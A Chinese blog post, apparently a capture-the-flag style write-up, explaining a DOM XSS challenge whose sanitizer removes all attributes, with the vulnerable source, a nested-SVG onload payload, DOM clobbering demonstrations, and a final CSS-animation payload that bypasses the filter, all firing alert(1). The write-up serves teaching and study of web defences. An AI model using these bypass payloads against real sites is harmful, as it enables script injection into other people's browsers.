XSS-DOM

已于 2024-08-18 18:24:17 修改
阅读量501 收藏 12
点赞数 6
文章标签: xss javascript 前端
于 2024-08-18 18:22:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51502737/article/details/141302731
版权

文章目录

源码

<script>
 const data = decodeURIComponent(location.hash.substr(1));;
 const root = document.createElement('div');
 root.innerHTML = data;
 
 // 这里模拟了XSS过滤的过程,方法是移除所有属性,sanitizer
 for (let el of root.querySelectorAll('*')) {
  let attrs = [];
  for (let attr of el.attributes) {
   attrs.push(attr.name);
  }
  for (let name of attrs) {
   el.removeAttribute(name);
  }
 }    
  document.body.appendChild(root); 
 
</script>

可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。
在这里插入图片描述
当尝试输入弹窗警告代码时,没有反应-在执行前属性被删除了。

SVG标签

HTML树型结构
在这里插入图片描述
在文档中的script标签会阻塞DOM的构造。
在这里插入图片描述
先注释掉过滤代码,此时正常弹窗
在这里插入图片描述
payload:<svg><svg src=1 onload=alert(1)></svg>
在这里插入图片描述
最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。

Dom-Clobbring

采用DOM劫持

    <img id="x">
    <img name="y">
    <script>
        console.log(x);
        console.log(y);
        console.log(document.x);
        console.log(document.y);
        console.log(window.x);
        console.log(window.y);
    </script>

在这里插入图片描述
我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。

但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。
在这里插入图片描述

tostring

Object.getOwnPropertyNames(window) 
.filter(p => p.match(/Element$/)) 
.map(p => window[p])  
.filter(p => p && p.prototype && p.prototype.toString !== Object.prototype.toString)

我们可以得到两种标签对象:

HTMLAreaElement ()& HTMLAnchorElement (<a>),利用href属性来进行字符串转换。

<body>
    <a id="test" href="http://xianoupeng.com">aaa</a>
</body>
<script>
    alert(test)
</script>

在这里插入图片描述
引入name属性:

    <div id=x>
        <a id=y href='www.xianoupeng.com'></a>
    </div>
    <script>
        alert(x.y);
    </script>

在这里插入图片描述

使用payload:<style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert(1)"><input id=attributes><input id=attributes>解决最初的问题
在这里插入图片描述

欸嘿aq
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss-labs-master.rar
05-09
根据脚本的执行环境,XSS被分为三种类型:反射型XSS、存储型XSSDOMXSS。 1. 反射型XSS:恶意代码通过URL参数传递,当用户点击链接或提交表单时触发。 2. 存储型XSS:恶意脚本被永久存储在服务器上,所有访问该...
xss-labs-master源码
07-06
例如,"level9.php"可能涉及到DOM-based XSS,"level13.php"可能涉及存储型XSS,每个级别都会引入不同的攻击场景和技术。 最后,"level6.php"到"level7.php"等文件代表了难度逐渐升级的过程,学习者需要掌握不同...
CTFHUB-WEB-XSS-DOM反射
weixin_49539962的博客
08-08 311
但是在输入xss代码是要注意,我们可控的是“CTFHUB is very niubility”这句话,需要把这句话闭合后插入xss代码才能生效。和反射型是一样的,使用xss platform。
Web渗透:XSS-DOM-based XSS
WolvenSec的博客
06-21 1185
DOM-based XSS(基于DOM的跨站脚本攻击)是一种XSS攻击类型,其特点是恶意脚本通过操作文档对象模型(DOM)直接在客户端执行,而无需经过服务器的处理。这种攻击主要利用客户端JavaScript代码中的漏洞,使得攻击者能够在浏览器中注入并执行恶意代码。
3.XSS-DOM型(基础和进阶)
最新发布
愿听风成曲
06-22 292
不与后台服务器产生数据交互,通过前端dom节点形成的XSS漏洞。进行测试一下,输入111,会显示what do you see查看元素代码,看到What do you see根据前端页面语句进行编写弹窗攻击代码粘贴到搜索框中,点击clikc me在点击what do you see?就会弹出一个窗口,但是刷新一下就没有了前端的输入被DOM获取到了,通过DOM又在前端输出了,
DVWA-xss-dom
AI_SumSky的博客
11-27 5055
xssdom DOM XSS:通过修改页面的DOM节点形成的XSS。 可触发DOM-XSS的属性: document.referer ,window.name ,location, innerHTML, document.write low级别 提交参数发现是以get的方式提交的,可以尝试注入 注入pyload:发现产生js弹窗,证明存在xss漏洞 分析源码发现后端没有对参数的输出和输入做任何处理 medium级别 分析源码发现对<script做了过滤,当存在<script,页面就
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
3. **DOMXSS**:不涉及服务器,而是由于网页的DOM(Document Object Model)解析不当,导致恶意代码在用户的浏览器中执行。 **XSS攻击原理** XSS攻击通常通过诱使用户点击含有恶意脚本的链接,或者提交包含恶意...
xss-lab全通关教程
05-07
首先,我们要理解XSS的三种主要类型:反射型XSS、存储型XSSDOMXSS。反射型XSS是通过诱使用户点击含有恶意代码的链接来触发,而存储型XSS则是在网站的数据库中注入代码,当其他用户查看时触发。DOMXSS则与前...
xss-labs.zip
03-18
XSS攻击通常分为三种类型:反射型XSS、存储型XSSDOMXSS。 1. 反射型XSS:这种攻击依赖于用户点击一个带有恶意脚本的链接。当链接被访问时,恶意代码会在页面上执行。例如,攻击者可能会在URL中插入恶意脚本,...
安装xss-labs ppt手册
10-22
1. **学习XSS基础知识**:在开始实际操作前,了解XSS的分类(反射型、存储型和DOM型)以及常见的攻击手段是非常重要的。理解XSS攻击的原理和危害,能够帮助你更好地应对挑战。 2. **准备Payload库**:XSS攻击往往...
lucy-xss-filter
04-30
同时支持DOM和SAX解析器。XssPreventer 使用apache-common-lang3库防止XSS攻击。 只需按如下所示转换所有输入字符串,即可在网络浏览器中将其识别为HTML标记。 < → < > → > " → " ' → 'Xss...
xss-demo-master.zip
04-21
3. DOMXSS:与前两者不同,DOMXSS不依赖服务器,而是利用了客户端JavaScriptDOM(Document Object Model)的解析。攻击者可以通过改变DOM元素中的数据来注入恶意脚本,这可能来自于不安全的用户输入、第三方...
xss-platform-master.zip
04-21
XSS攻击通常分为三种类型:反射型XSS、存储型XSSDOMXSS。 1. 反射型XSS:攻击者构造带有恶意脚本的URL,诱使用户点击,脚本在用户浏览器上执行。 2. 存储型XSS:恶意脚本被存储在服务器端,当其他用户访问包含...
xss-lab靶场资源包
07-27
3. DOMXSS:与前两者不同,DOMXSS不涉及服务器,而是由于网页的DOM(Document Object Model)处理了不安全的用户输入,导致恶意脚本在客户端执行。攻击者可以通过修改DOM元素的属性或值来触发攻击。 XSS-Lab...
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
3. **DOMXSS**:不涉及服务器,而是利用浏览器的DOM(Document Object Model)特性,通过修改页面的DOM结构来注入和执行恶意脚本。 **XSS-Labs的使用** XSS-Labs靶场提供了丰富的实战场景,涵盖了上述各种类型的...
xss-injection
04-04
XSS攻击主要分为三种类型:存储型XSS、反射型XSSDOMXSS。 1. **存储型XSS**:这种类型的XSS攻击将恶意脚本存储在服务器上,如在论坛帖子或用户评论中。当其他用户加载含有恶意脚本的页面时,脚本会在他们的...
xss-platform.rar
05-27
3. **实战演练**:11个模块涵盖了XSS攻击的常见场景,如反射型XSS、存储型XSSDOMXSS等,开发者可以通过实践操作,加深对XSS攻击原理和防范措施的理解。 4. **学习资源**:平台可能还包含了相关的学习资料和教程...
WEB渗透学习-XSS-labs靶场
04-20
3. **DOMXSSDOM-Based XSS)**:这种XSS不依赖服务器,而是利用了浏览器的DOM(Document Object Model)解析机制。攻击者可以通过修改DOM元素的属性,使得页面在本地执行恶意脚本。在XSS-labs中,你需要理解DOM...
xss-labs通关
09-11
您好!对于 xss-labs 的通关,我可以提供一些基本的指导。首先,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过插入恶意脚本来利用网站上的用户。要通关 xss-labs,您需要了解并掌握以下内容: 1. XSS 攻击原理和类型:了解什么是 XSS 攻击以及其不同的类型,包括反射型、存储型和 DOMXSS。 2. 漏洞挖掘和利用:学习如何发现和识别 XSS 漏洞,了解攻击者可能会利用这些漏洞进行的各种攻击。 3. 防御措施:了解如何预防 XSS 攻击,包括输入验证、输出编码、内容安全策略(CSP)等。 4. 工具使用:熟悉一些常用的漏洞扫描工具和渗透测试工具,例如 Burp Suite、OWASP Zap 等。 5. 实践演练:在合法授权的情况下,通过实例进行实践演练,即在模拟的环境中尝试利用 XSS 漏洞进行攻击或防御。 请注意,在进行任何渗透测试或漏洞利用活动时,务必遵守法律和道德规范,仅在合法授权下进行。希望这些信息对您有所帮助,祝您顺利通关 xss-labs!如有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值